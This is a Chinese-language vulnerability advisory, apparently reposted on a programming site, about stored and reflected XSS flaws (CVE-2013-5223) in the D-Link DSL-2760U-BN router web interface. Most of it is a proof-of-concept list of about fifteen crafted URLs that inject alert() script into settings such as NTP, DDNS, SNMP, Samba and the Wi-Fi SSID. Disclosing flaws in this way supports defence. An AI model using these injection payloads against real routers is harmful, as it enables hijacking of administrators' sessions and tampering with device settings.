发布日期:2013-11-10
更新日期:2013-11-17受影响系统:
D-Link DSL-2760U-BN
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 63648
CVE(CAN) ID: CVE-2013-5223D-Link 2760N是款路由器产品。D-Link 2760N在Web UI的不同节段实现上存在多个存储型和反射型跨站脚本漏洞,成功利用后可导致在受影响浏览器上下文中执行HTML和脚本代码。<*来源:Liad Mizrachi
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!==========================
PoC
==========================
1) NTS Settings
http://www.example.com/sntpcfg.cgi?ntp_enabled=1&ntpServer1=locahost%22;alert%28%27XSS%27%29;//&ntpServer2=time-nw.nist.gov&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=+02:00&timezone=Jerusalem&use_dst=02) Dynamic DNS (Reflected/Stored)
http://www.example.com/ddnsmngr.cmd?action=add&service=1&hostname=aaaa&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=zzzzzz&iface=ppp03)Parental Control
http://www.example.com/todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&mac=f1:de:f1:ab:cb:6d&days=1&start_time=571&end_time=7324) URL Filtering
http://www.example.com/urlfilter.cmd?action=set_url&TodUrlAdd=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&port_num=805) NAT - Port Triggering
http://www.example.com/scprttrg.cmd?action=add&appName=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&dstWanIf=ppp0&tStart=1111,&tEnd=1112,&tProto=1,&oStart=11,&oEnd=11,&oProto=1,6) IP Filtering:
http://www.example.com/scoutflt.cmd?action=add&fltName=<script>alert("XSS")</script>&protocol=1&srcAddr=10.0.0.10&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.12&dstMask=255.255.255.0&dstPort=80807) IP Filtering - Removal Error:
http://www.example.com/scoutflt.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E8) Interface Grouping (also reflected on "Local Area Network (LAN) Setup"):
http://www.example.com/portmapcfg.cmd?action=add&groupName=<Script>alert("XSS")</script>&choiceBox=|usb0|wl0|&wanIfName=atm19) SNMP
http://www.example.com/snmpconfig.cgi?snmpStatus=1&snmpRoCommunity=%27;alert(%27XSS%27)&snmpRwCommunity=private&snmpSysName=D-LINK&snmpSysContact=unknown&snmpSysLocation=unknown&snmpTrapIp=0.0.0.010) Incoming IP Filter:
http://www.example.com/scinflt.cmd?action=add&wanIf=ppp0&fltName=<script>alert("XSS&protocol=2&srcAddr=SS")</script>&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.10&dstMask=255.255.255.0&dstPort=808011) Policy Routing Add:
http://www.example.com/prmngr.cmd?action=add&PolicyName=<script>alert("X&SourceIp=SS");</script>&lanIfcName=wl0&wanIf=ppp0&defaultgw=10.0.0.11112)Policy Routing -Removal Error:
http://www.example.com/prmngr.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E13) Printer Server
http://www.example.com/ippcfg.cmd?action=savapply&ippEnabled=1&ippMake=aa&ippName=aa";alert("XSS-Printer-Sever");//14) SAMBA Configuration
http://www.example.com/samba.cgi?enableSmb=1&smbNetBiosName=";var x="XSS";//&smbDirName=b";alert(x);//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no
OR
http://www.example.com/samba.cgi?enableSmb=1&smbNetBiosName=";alert("SAMBA-X&smbDirName=SS");//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no15) WiFi SSID
Step 1 (Create XSS as Wireless SSID):
http://www.example.com/wlcfg.wl?wlSsidIdx=0&wlEnbl=1&wlHide=0&wlAPIsolation=0&wlSsid=%3CScript%3Ealert(%27XSSID%27)%3C/script%3E&wlCountry=IL&wlMaxAssoc=16&wlDisableWme=0&wlEnableWmf=0&wlEnbl_wl0v1=0&wlSsid_wl0v1=wl0_Guest1&wlHide_wl0v1=0&wlAPIsolation_wl0v1=0&wlDisableWme_wl0v1=0&wlEnableWmf_wl0v1=0&wlMaxAssoc_wl0v1=16&wlEnbl_wl0v2=0&wlSsid_wl0v2=wl0_Guest2&wlHide_wl0v2=0&wlAPIsolation_wl0v2=0&wlDisableWme_wl0v2=0&wlEnableWmf_wl0v2=0&wlMaxAssoc_wl0v2=16&wlEnbl_wl0v3=0&wlSsid_wl0v3=wl0_Guest3&wlHide_wl0v3=0&wlAPIsolation_wl0v3=0&wlDisableWme_wl0v3=0&wlEnableWmf_wl0v3=0&wlMaxAssoc_wl0v3=16Step 2:
Goto the Wireless -> Security [http://www.example.com/wlsecurity.html]
OR
Goto the Wireless -> MAC Filter [http://
www.example.com/wlmacflt.cmd?action=view]建议:
--------------------------------------------------------------------------------
厂商补丁:D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.dlink.com/
http://www.dlink.com
http://www.dlink.com.tr/en/arts/117.html
http://www.netcheif.com/downloads/DSL-2760U_user_manual.pdfJustSystems多个产品代码执行漏洞Google Chrome libjingle释放后重利用远程代码执行漏洞(CVE-2013-6631)相关资讯 D-Link D-Link漏洞
- 多个D-Link产品UPnP缓冲区溢出漏洞 (07/29/2015 13:27:45)
- D-Link DIR-645路由器远程任意命令 (06/02/2015 19:48:48)
- D-Link DIR-601身份验证绕过漏洞 (05/05/2015 14:10:55)
| - 多个D-Link产品HTTP缓冲区溢出漏洞 (07/29/2015 13:27:16)
- 多个D-Link产品缓冲区溢出漏洞(CVE (06/02/2015 19:45:40)
- D-Link和趋势网络路由器发现远程执 (04/30/2015 07:44:07)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论
|
易网时代-编程资源站